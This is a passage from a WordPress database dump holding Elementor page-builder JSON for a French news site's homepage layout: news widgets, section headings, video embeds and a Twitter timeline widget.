,\"settings\":{\"testimonial_content\":\"Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"qv96y21\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"qt5cd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1524,513,'_elementor_version','0.4'),(1526,514,'_elementor_edit_mode','builder'),(1527,514,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"etkgpka\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"qhy9zif\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1528,514,'_elementor_version','0.4'),(1529,514,'_elementor_css','a:3:{s:4:\"time\";i:1508933165;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1530,515,'_elementor_edit_mode','builder'),(1531,515,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"p